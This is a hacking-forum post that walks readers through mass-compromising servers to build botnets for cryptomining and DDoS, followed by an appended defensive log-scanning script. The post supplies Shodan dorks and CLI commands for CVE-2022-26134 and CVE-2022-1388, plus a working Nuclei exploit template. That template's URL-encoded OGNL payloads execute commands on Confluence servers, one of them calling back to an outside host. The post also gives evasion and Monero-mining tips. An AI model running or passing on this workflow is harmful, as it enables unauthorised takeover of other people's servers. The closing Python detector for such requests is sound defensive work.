July 24, 2022 at 8:23 AM
Hello and welcome, it's Nu11BI7.
I will try to teach and explain how to gather some zombies for cryptojacking stuff, DDoS attacks, or anything else you may use a lot of hacked PCs and VPSes to do for you.
Summary:
We will search Shodan (a website for monitoring IPs across the world) with dorks for CVEs. We will get a list of IPs and scan them for the CVE with Nuclei templates, and get more than 10k hacked devices (randomly). Note: the number depends on the CVE you choose to search for.
Req:
1. Shodan account with membership
Membership in Shodan costs $50, or you can get it for free if you have a (.edu) mail; check my thread for selling edu mails here "/Thread-Selling-500k-private-working-edu-mails"
2. VPN (Mullvad or Proton); refer to the OPSEC threads
3. Basic scripting skills
Let's begin...
After getting your Shodan membership and setting up your VPN properly:
Step 1. Search for new CVEs (RCE only), learn how they work, and study them well.
We will use 2 CVEs for this thread:
1.CVE-2022-26134 [X-Confluence] *RCE*
2.CVE-2022-1388 [BIG-IP Firewall] *RCE*
Take a look at both CVEs and their POCs on GitHub.
Step 2. Now that you understand why these CVEs exist, make a dork for Shodan using a unique identifier for these services.
1. dork for CVE-2022-26134 [ X-Confluence ]
2. dork for CVE-2022-1388 [ http.title:"BIG-IP®-+Redirect"]
These are the two dorks for the Shodan search.
Step 3. We will use the Shodan CLI to grab IPs related to this service:
shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt
Now you should see a list of IPs with ports.
[attachment=732]
Step 4. We will use httprobe or httpx to see which hosts are live:
cat hosts | httprobe -c 50 | tee live_hosts.txt
Step 5. We will use Nuclei to automate testing whether the vuln exists.
Since we are now using the 1st CVE (Confluence), we will use this template:
info:
  name: Confluence - Remote Code Execution
  author: pdteam,jbertman
  severity: critical
  description: |
    Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
    - https://jira.atlassian.com/browse/CONFSERVER-79016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26134
    cwe-id: CWE-74
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
    verified: "true"
  tags: cve,cve2022,confluence,rce,ognl,oast,cisa

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(all_headers_1), "x-cmd-response:")'

      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(to_lower(response_2), "confluence")'
        condition: and

    extractors:
      - type: kval
        part: header
        kval:
          - "x_cmd_response"

# Enhanced by mp on 2022/07/04

Save it under attack.yaml
Step 6. Now we will pass the live hosts to this template:
cat live_hosts.txt | nuclei -bs 50 -c 50 -t attack.yaml
Now you should wait and watch your zombies pop up in front of your eyes. Now you can use those hacked devices to install a cryptominer, run DDoS attacks, or anything else. A new thread will cover how to automate those hacked devices with Python to do tasks for you. Stay ahead and wait for more.
[attachment=733]
Important notes:
Don't use this method without hiding yourself.
Don't try this without knowing what you do.
Don't ssh to any hacked device from your local PC.
Don't mine to your Bitcoin wallet (XMR only).
Don't be a dumbass.
This is a basic method, not an advanced one.
Tools used: httprobe | Shodan CLI | Nuclei
Don't forget to give reputation :)
#Nu11BI7
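From the defender's side, the Nuclei template in this post shows what a CVE-2022-26134 scan looks like on the wire: the OGNL expression is carried in the URI path itself, URL-encoded, so the decoded path begins with "/${" and the command-execution form contains an @Class@method( static call. The script below is an added example written for this page, not code from the post or from the Nuclei project; it reads Apache/Tomcat combined-format access logs, flags such requests, distinguishes bare probes (like "${1+1}") from static-call payloads, and groups hits by source address so a mass-scan burst stands out. The log lines, the source addresses and the "oast.example" callback domain are constructed for the example; the log format and the regular expressions are assumptions about your environment. Detection like this only catches exploitation attempts after the fact; the fix is the patched version from the Atlassian advisory referenced in the template.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/Tomcat combined format), not taken
# from any real server. Source addresses are RFC 5737 documentation ranges and
# "oast.example" stands in for whatever callback domain a scanner would use.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Jul/2022:08:23:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20oast.example%22%29%7D/ HTTP/1.1" 302 0 "-" "python-requests/2.28"
203.0.113.10 - - [24/Jul/2022:08:23:02 +0000] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0 "-" "python-requests/2.28"
198.51.100.7 - - [24/Jul/2022:08:25:13 +0000] "GET /login.action HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Jul/2022:08:25:20 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# CVE-2022-26134 requests put an OGNL expression in the URI path, so after
# decoding the path starts with "/${". A static-method call such as
# @java.lang.Runtime@getRuntime() inside it is the command-execution form.
OGNL_AT_START = re.compile(r'^/\$\{')
STATIC_CALL = re.compile(r'@[\w.]+@\w+\(')


def fully_decode(path: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded), so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(path: str) -> Optional[str]:
    """Return None for normal traffic, otherwise a verdict string."""
    decoded = fully_decode(path)
    if not OGNL_AT_START.search(decoded):
        return None
    return "ognl-static-call" if STATIC_CALL.search(decoded) else "ognl-probe"


def scan_log(text: str) -> list:
    """Parse each log line and collect the ones whose path carries an OGNL expression."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        verdict = classify_path(m.group("path"))
        if verdict:
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "path": fully_decode(m.group("path")),
                "verdict": verdict,
            })
    return hits


def sources_by_hits(hits: list) -> Counter:
    """Hits per source address; a scanner sweeping a Shodan list shows up as one busy source."""
    return Counter(h["src"] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["src"]} {h["verdict"]}: {h["path"]}')
    print("hits per source:", dict(sources_by_hits(found)))
```

Point the script at a real access log by replacing SAMPLE_LOG with the file contents; the HTTP status is recorded because Confluence answered these requests with a redirect, so a 302 to an OGNL path is not evidence that the attempt failed.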